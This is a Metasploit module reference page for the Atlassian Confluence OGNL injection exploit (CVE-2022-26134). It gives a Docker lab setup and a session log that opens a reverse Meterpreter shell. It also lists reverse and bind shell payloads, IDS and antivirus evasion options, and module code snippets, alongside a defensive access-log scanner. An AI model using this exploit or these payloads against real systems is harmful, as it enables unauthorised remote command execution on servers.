Atlassian Confluence Namespace OGNL Injection - Metasploit
This page contains detailed information about how to use the exploit/multi/http/atlassian_confluence_namespace_ognl_injection metasploit module. For a list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Atlassian Confluence Namespace OGNL Injection
Module: exploit/multi/http/atlassian_confluence_namespace_ognl_injection
Source code: modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb
Disclosure date: 2022-06-02
Last modification time: 2022-06-06 22:03:21 +0000
Supported architecture(s): cmd, x86, x64
Supported platform(s): Linux, Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8090, 8443, 8880, 8888
List of CVEs: CVE-2021-26084, CVE-2022-26134
This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
- artifacts-on-disk: Module leaves a payload or a dropper on the target machine.
Basic Usage
msf > use exploit/multi/http/atlassian_confluence_namespace_ognl_injection
msf exploit(atlassian_confluence_namespace_ognl_injection) > exploit
Required Options
- RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
Knowledge Base
Vulnerable Application
This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.
Confluence versions up to and including 7.18 are vulnerable to this OGNL injection flaw. For more complete information on affected and fixed versions, see CONFSERVER-79000.
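Because the module is flagged ioc-in-logs and the injection travels in the request URI, the web server access log is the natural place to look for attempts against a Confluence instance. The Python script below is an added example for defenders, not code from the module or from this page: it parses combined-format access log lines, percent-decodes the request path repeatedly so double-encoded requests are not missed, and reports every path that decodes to a ${...} expression. The log lines are constructed samples, and the assumption that an injected OGNL expression shows up in the path as ${...} belongs to this example rather than to the page.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache/Tomcat combined log format (not from the page).
# Lines 2 and 3 carry a harmless OGNL expression in the URI path, once
# URL-encoded and once double-encoded; lines 1 and 4 are ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Jun/2022:17:14:40 -0400] "GET /login.action HTTP/1.1" 200 8231 "-" "Mozilla/5.0"
10.0.0.9 - - [03/Jun/2022:17:14:41 -0400] "GET /%24%7B1%2B1%7D/ HTTP/1.1" 302 0 "-" "curl/7.68.0"
10.0.0.9 - - [03/Jun/2022:17:14:42 -0400] "GET /%2524%257B%2527a%2527.concat%2528%2527b%2527%2529%257D/ HTTP/1.1" 302 0 "-" "curl/7.68.0"
10.0.0.5 - - [03/Jun/2022:17:14:43 -0400] "GET /rest/api/search?cql=space%3D%22DEV%22 HTTP/1.1" 200 120 "-" "Mozilla/5.0"
"""

# Combined log format: client, identd, user, [timestamp], "METHOD target PROTO", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Assumption of this example: an injected OGNL expression appears in the path as ${ ... }.
OGNL_RE = re.compile(r'\$\{[^}]*\}')


def fully_decode(value, max_rounds=3):
    """Percent-decode until the string stops changing, so double encoding cannot hide the marker."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line):
    """Return a finding dict when the request path decodes to something containing ${...}, else None."""
    match = LOG_RE.match(line)
    if not match:
        return None
    # Only the path is inspected; the query string is split off and ignored here.
    path, _, _query = match.group('target').partition('?')
    hit = OGNL_RE.search(fully_decode(path))
    if not hit:
        return None
    return {
        'ip': match.group('ip'),
        'timestamp': match.group('ts'),
        'status': int(match.group('status')),
        'raw_path': path,
        'expression': hit.group(0),
    }


def scan_log(text):
    """Scan every line of an access log and return the findings in file order."""
    return [finding for finding in map(scan_line, text.splitlines()) if finding]


if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['timestamp']} {finding['ip']} status={finding['status']} "
              f"path={finding['raw_path']} expression={finding['expression']}")
```

Run against a real log with scan_log(open(path).read()); the decoded expression in each finding is what to triage, and the source IP and timestamp give the pivot for the rest of the investigation.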
Setup
- Create a new docker-compose.yml file with the contents below.
- Start the container using docker-compose up
- Navigate to the HTTP service running on port 8090
- Acquire and provide an evaluation license
- When prompted, set up a standalone / non-clustered system
- Configure the database settings:
  - Select "By connection string", then Database URL: jdbc:postgresql://postgresql:5432/confdb
  - Username and password are both confdb
- Setup takes a few minutes
- When prompted, select "Empty Site"
- Select "Manage users and groups within Confluence"
- Create an account; it will not be needed for exploitation
- Once setup has completed, select "Start" and set a space name to something
Docker Compose File
version: '3'
services:
  postgresql:
    image: postgres:11
    environment:
      POSTGRES_DB: confdb
      POSTGRES_USER: confdb
      POSTGRES_PASSWORD: confdb
    ports:
      - '5432:5432'
  confluence-server:
    depends_on:
      - postgresql
    image: atlassian/confluence:7.13.0
    ports:
      - '8090:8090'
      - '8091:8091'
Verification Steps
- Follow the steps from the Setup section to create a test instance
- Start msfconsole
- Run: use exploit/multi/http/atlassian_confluence_namespace_ognl_injection
- Set the RHOSTS, PAYLOAD and payload-related options
- Run the module
Scenarios
Confluence 7.13.0 in Docker
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set RHOSTS 192.168.159.100
RHOSTS => 192.168.159.100
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > check
[+] 192.168.159.100:8090 - The target is vulnerable. Successfully tested OGNL injection.
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[!] AutoCheck is disabled, proceeding with exploitation
[*] Executing cmd/unix/python/meterpreter/reverse_tcp (Unix Command)
[*] Sending stage (40132 bytes) to 192.168.159.100
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.100:42050) at 2022-06-03 17:14:41 -0400
meterpreter > getuid
Server username: confluence
meterpreter > sysinfo
Computer : 5052c5eebf8a
OS : Linux 5.15.0-35-generic #36-Ubuntu SMP Sat May 21 02:24:07 UTC 2022
Architecture : x64
System Language : en_US
Meterpreter : python/linux
meterpreter >
Msfconsole Usage
Here is how the multi/http/atlassian_confluence_namespace_ognl_injection exploit module looks in the msfconsole:
msf6 > use exploit/multi/http/atlassian_confluence_namespace_ognl_injection
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > show info
Name: Atlassian Confluence Namespace OGNL Injection
Module: exploit/multi/http/atlassian_confluence_namespace_ognl_injection
Platform: Unix, Linux
Arch: cmd, x86, x64
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2022-06-02
Provided by:
Unknown
bturner-r7
jbaines-r7
Spencer McIntyre
Module side effects:
ioc-in-logs
artifacts-on-disk
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 Unix Command
1 Linux Dropper
Check supported:
Yes
Basic options:
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT      8090             yes       The target port (TCP)
SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT    8080             yes       The local port to listen on.
SSL        false            no        Negotiate SSL/TLS for outgoing connections
SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
TARGETURI  /                yes       Base path
URIPATH                     no        The URI to use for this exploit (default is random)
VHOST                       no        HTTP server virtual host
Payload information:
Description:
This module exploits an OGNL injection in Atlassian Confluence
servers. A specially crafted URI can be used to evaluate an OGNL
expression resulting in OS command execution.
References:
https://nvd.nist.gov/vuln/detail/CVE-2021-26084
https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro
https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py
https://github.com/jbaines-r7/through_the_wire
https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
Module Options
This is a complete list of options available in the multi/http/atlassian_confluence_namespace_ognl_injection exploit:
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > show options
Module options (exploit/multi/http/atlassian_confluence_namespace_ognl_injection):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT      8090             yes       The target port (TCP)
SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT    8080             yes       The local port to listen on.
SSL        false            no        Negotiate SSL/TLS for outgoing connections
SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
TARGETURI  /                yes       Base path
URIPATH                     no        The URI to use for this exploit (default is random)
VHOST                       no        HTTP server virtual host
Payload options (cmd/unix/python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.0.126 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Unix Command
Advanced Options
Here is a complete list of advanced options supported by the multi/http/atlassian_confluence_namespace_ognl_injection exploit:
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > show advanced
Module advanced options (exploit/multi/http/atlassian_confluence_namespace_ognl_injection):
Name                     Current Setting  Required  Description
----                     ---------------  --------  -----------
AutoCheck                true             no        Run check before exploit
CMDSTAGER::DECODER                        no        The decoder stub to use.
CMDSTAGER::FLAVOR        auto             no        The CMD Stager to use. (Accepted: auto, bourne, debug_asm, debug_write, echo, printf, vbs, vbs_adodb, certutil, tftp, wget, curl, fetch, lwprequest, psh_invokewebrequest)
CMDSTAGER::SSL           false            no        Use SSL/TLS for supported stagers
CMDSTAGER::TEMP                           no        Writable directory for staged files
ContextInformationFile                    no        The information file that contains context information
DOMAIN                   WORKSTATION      yes       The domain to use for Windows authentication
DigestAuthIIS            true             no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
DisablePayloadHandler    false            no        Disable the handler code for the selected payload
EXE::Custom                               no        Use custom exe instead of automatically generating a payload exe
EXE::EICAR               false            no        Generate an EICAR file instead of regular payload exe
EXE::FallBack            false            no        Use the default template in case the specified one is missing
EXE::Inject              false            no        Set to preserve the original EXE function
EXE::OldMethod           false            no        Set to use the substitution EXE generation method.
EXE::Path                                 no        The directory in which to look for the executable template
EXE::Template                             no        The executable template file name.
EnableContextEncoding    false            no        Use transient context when encoding payloads
FingerprintCheck         true             no        Conduct a pre-exploit fingerprint verification
ForceExploit             false            no        Override check result
HttpClientTimeout                         no        HTTP connection and receive timeout
HttpPassword                              no        The HTTP password to specify for authentication
HttpRawHeaders                            no        Path to ERB-templatized raw headers to append to existing headers
HttpTrace                false            no        Show the raw HTTP requests and responses
HttpTraceColors          red/blu          no        HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly     false            no        Show HTTP headers only in HttpTrace
HttpUsername                              no        The HTTP username to specify for authentication
ListenerBindAddress                       no        The specific IP address to bind to if different from SRVHOST
ListenerBindPort                          no        The port to bind to if different from SRVPORT
ListenerComm                              no        The specific communication channel to use for this service
MSI::Custom                               no        Use custom msi instead of automatically generating a payload msi
MSI::EICAR               false            no        Generate an EICAR file instead of regular payload msi
MSI::Path                                 no        The directory in which to look for the msi template
MSI::Template                             no        The msi template file name
MSI::UAC                 false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
SSLCipher                                 no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
SSLCompression           false            no        Enable SSL/TLS-level compression
SSLServerNameIndication                   no        SSL/TLS Server Name Indication (SNI)
SSLVersion               Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SendRobots               false            no        Return a robots.txt file if asked for one
URIHOST                                   no        Host to use in URI (useful for tunnels)
URIPORT                                   no        Port to use in URI (useful for tunnels)
UserAgent                Mozilla/5.0 (iPad; CPU OS 15_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Mobile/15E148 Safari/604.1  no  The User-Agent header to use for all requests
VERBOSE                  false            no        Enable detailed status messages
WORKSPACE                                 no        Specify the workspace for this module
WfsDelay                 2                no        Additional delay in seconds to wait for a session
Payload advanced options (cmd/unix/python/meterpreter/reverse_tcp):
Name                         Current Setting  Required  Description
----                         ---------------  --------  -----------
AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
AutoRunScript                                 no        A script to run automatically on session creation.
AutoSystemInfo               true             yes       Automatically capture system information on initialization.
AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding          false            no        Encode the second stage payload
EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpCookie                                    no        An optional value to use for the Cookie HTTP header
HttpHostHeader                                no        An optional value to use for the Host HTTP header
HttpReferer                                   no        An optional value to use for the Referer HTTP header
InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild        false            no        Enable debugging for the Python meterpreter
MeterpreterDebugLogging                       no        The Meterpreter debug logging configuration, see https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Debugging-Meterpreter-Sessions
MeterpreterTryToFork         true             no        Fork a new process if the functionality is available
PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
PingbackRetries              0                yes       How many additional successful pingbacks
PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
ReverseListenerComm                           no        The specific communication channel to use for this listener
ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
VERBOSE                      false            no        Enable detailed status messages
WORKSPACE                                     no        Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the multi/http/atlassian_confluence_namespace_ognl_injection module can exploit:
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > show targets
Exploit targets:
Id Name
-- ----
0 Unix Command
1 Linux Dropper
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/atlassian_confluence_namespace_ognl_injection exploit:
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK)
1 payload/cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
2 payload/cmd/unix/bind_jjs normal No Unix Command Shell, Bind TCP (via jjs)
3 payload/cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua)
4 payload/cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat)
5 payload/cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e)
6 payload/cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6
7 payload/cmd/unix/bind_nodejs normal No Unix Command Shell, Bind TCP (via nodejs)
8 payload/cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
9 payload/cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
10 payload/cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R)
11 payload/cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
12 payload/cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
13 payload/cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat)
14 payload/cmd/unix/bind_stub normal No Unix Command Shell, Bind TCP (stub)
15 payload/cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh)
16 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
17 payload/cmd/unix/pingback_bind normal No Unix Command Shell, Pingback Bind TCP (via netcat)
18 payload/cmd/unix/pingback_reverse normal No Unix Command Shell, Pingback Reverse TCP (via netcat)
19 payload/cmd/unix/python/meterpreter/bind_tcp normal No Python Exec, Python Meterpreter, Python Bind TCP Stager
20 payload/cmd/unix/python/meterpreter/bind_tcp_uuid normal No Python Exec, Python Meterpreter, Python Bind TCP Stager with UUID Support
21 payload/cmd/unix/python/meterpreter/reverse_http normal No Python Exec, Python Meterpreter, Python Reverse HTTP Stager
22 payload/cmd/unix/python/meterpreter/reverse_https normal No Python Exec, Python Meterpreter, Python Reverse HTTPS Stager
23 payload/cmd/unix/python/meterpreter/reverse_tcp normal No Python Exec, Python Meterpreter, Python Reverse TCP Stager
24 payload/cmd/unix/python/meterpreter/reverse_tcp_ssl normal No Python Exec, Python Meterpreter, Python Reverse TCP SSL Stager
25 payload/cmd/unix/python/meterpreter/reverse_tcp_uuid normal No Python Exec, Python Meterpreter, Python Reverse TCP Stager with UUID Support
26 payload/cmd/unix/python/meterpreter_bind_tcp normal No Python Exec, Python Meterpreter Shell, Bind TCP Inline
27 payload/cmd/unix/python/meterpreter_reverse_http normal No Python Exec, Python Meterpreter Shell, Reverse HTTP Inline
28 payload/cmd/unix/python/meterpreter_reverse_https normal No Python Exec, Python Meterpreter Shell, Reverse HTTPS Inline
29 payload/cmd/unix/python/meterpreter_reverse_tcp normal No Python Exec, Python Meterpreter Shell, Reverse TCP Inline
30 payload/cmd/unix/python/pingback_bind_tcp normal No Python Exec, Python Pingback, Bind TCP (via python)
31 payload/cmd/unix/python/pingback_reverse_tcp normal No Python Exec, Python Pingback, Reverse TCP (via python)
32 payload/cmd/unix/python/shell_bind_tcp normal No Python Exec, Command Shell, Bind TCP (via python)
33 payload/cmd/unix/python/shell_reverse_tcp normal No Python Exec, Command Shell, Reverse TCP (via python)
34 payload/cmd/unix/python/shell_reverse_tcp_ssl normal No Python Exec, Command Shell, Reverse TCP SSL (via python)
35 payload/cmd/unix/python/shell_reverse_udp normal No Python Exec, Command Shell, Reverse UDP (via python)
36 payload/cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
37 payload/cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK)
38 payload/cmd/unix/reverse_bash normal No Unix Command Shell, Reverse TCP (/dev/tcp)
39 payload/cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
40 payload/cmd/unix/reverse_bash_udp normal No Unix Command Shell, Reverse UDP (/dev/udp)
41 payload/cmd/unix/reverse_jjs normal No Unix Command Shell, Reverse TCP (via jjs)
42 payload/cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh)
43 payload/cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua)
44 payload/cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat)
45 payload/cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat)
46 payload/cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e)
47 payload/cmd/unix/reverse_nodejs normal No Unix Command Shell, Reverse TCP (via nodejs)
48 payload/cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl)
49 payload/cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
50 payload/cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
51 payload/cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php)
52 payload/cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python)
53 payload/cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python)
54 payload/cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R)
55 payload/cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
56 payload/cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
57 payload/cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat)
58 payload/cmd/unix/reverse_ssh normal No Unix Command Shell, Reverse TCP SSH
59 payload/cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
60 payload/cmd/unix/reverse_stub normal No Unix Command Shell, Reverse TCP (stub)
61 payload/cmd/unix/reverse_tclsh normal No Unix Command Shell, Reverse TCP (via Tclsh)
62 payload/cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh)
63 payload/generic/custom normal No Custom Payload
64 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
65 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
66 payload/generic/ssh/interact normal No Interact with Established SSH Connection
Evasion Options
Here is the full list of possible evasion options supported by the multi/http/atlassian_confluence_namespace_ognl_injection exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > show evasion
Module evasion options:
Name                          Current Setting  Required  Description
----                          ---------------  --------  -----------
HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
HTTP::header_folding          false            no        Enable folding of HTTP headers
HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
HTTP::method_random_case      false            no        Use random casing for the HTTP method
HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
TCP::max_send_size            0                no        Maximum tcp segment size. (0 = disable)
TCP::send_delay               0                no        Delays inserted before every send. (0 = disable)
Error Messages
This module may fail with the following error messages:
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Failed to test OGNL injection.
Here is a relevant code snippet related to the "Failed to test OGNL injection." error message:
    res = inject_ognl('', header: header) # empty command works for testing, the header will be set

    return CheckCode::Unknown unless res

    unless res && res.headers.include?(header)
      return CheckCode::Safe('Failed to test OGNL injection.')
    end

    CheckCode::Vulnerable('Successfully tested OGNL injection.')
  end

Successfully tested OGNL injection.
Here is a relevant code snippet related to the "Successfully tested OGNL injection." error message:

    unless res && res.headers.include?(header)
      return CheckCode::Safe('Failed to test OGNL injection.')
    end

    CheckCode::Vulnerable('Successfully tested OGNL injection.')
  end

  def get_confluence_version
    return @confluence_version if @confluence_version

Failed to execute command: <CMD>
Here is a relevant code snippet related to the "Failed to execute command: <CMD>" error message:
  def execute_command(cmd, _opts = {})
    header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
    res = inject_ognl(cmd, header: header)

    unless res && res.headers.include?(header)
      fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
    end

    vprint_good("Successfully executed command: #{cmd}")
    res.headers[header]
  end
Related Pull Requests
- #16650 Merged Pull Request: Add #read_from_file for MSSQL and PostgreSQL, fix the MySQL implementation
- #16602 Merged Pull Request: Fix error when service is already running and update exception documentation in lib/msf/core/post/windows/services.rb
- #16627 Merged Pull Request: Add some error handling to update_payload_cache_size script
- #16679 Merged Pull Request: Fix missing and incomplete specs
- #16654 Merged Pull Request: Add named pipe pivot documentation
- #16571 Merged Pull Request: Vcenter offline mdb extract
- #16667 Merged Pull Request: Weekly dependency updates for Gemfile.lock
- #16666 Merged Pull Request: Correctly format the notes sections
- #16665 Merged Pull Request: Fix random compile c tool
- #16662 Merged Pull Request: Add faraday retry gem dependency
References
- CVE-2021-26084
- https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro
- https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py
- https://github.com/jbaines-r7/through_the_wire
- https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
See Also
Check also the following modules related to this module:
- exploit/multi/http/atlassian_confluence_webwork_ognl_injection
- exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce
- auxiliary/scanner/http/atlassian_crowd_fileaccess
- exploit/linux/http/atlassian_confluence_webwork_ognl_injection
- exploit/multi/http/confluence_widget_connector
- exploit/multi/http/struts2_namespace_ognl
- exploit/multi/http/apache_roller_ognl_injection
- exploit/multi/http/struts2_content_type_ognl
- exploit/multi/http/struts2_multi_eval_ognl
- exploit/multi/http/bassmaster_js_injection
- exploit/multi/http/cmsms_object_injection_rce
- exploit/multi/http/gitlist_arg_injection
- exploit/multi/http/log4shell_header_injection
- exploit/multi/http/php_cgi_arg_injection
- exploit/multi/http/phpmailer_arg_injection
- exploit/multi/http/playsms_template_injection
- exploit/multi/http/spring_cloud_function_spel_injection
- exploit/multi/browser/firefox_tostring_console_injection
- exploit/multi/browser/firefox_webidl_injection
- exploit/multi/fileformat/evince_cbt_cmd_injection
- exploit/multi/fileformat/js_unpacker_eval_injection
- exploit/multi/fileformat/peazip_command_injection
- exploit/linux/local/nested_namespace_idmap_limit_priv_esc
Authors
- Unknown
- bturner-r7
- jbaines-r7
- Spencer McIntyre
Version
This page has been produced using Metasploit Framework version 6.2.4-dev. For more modules, visit the Metasploit Module Library.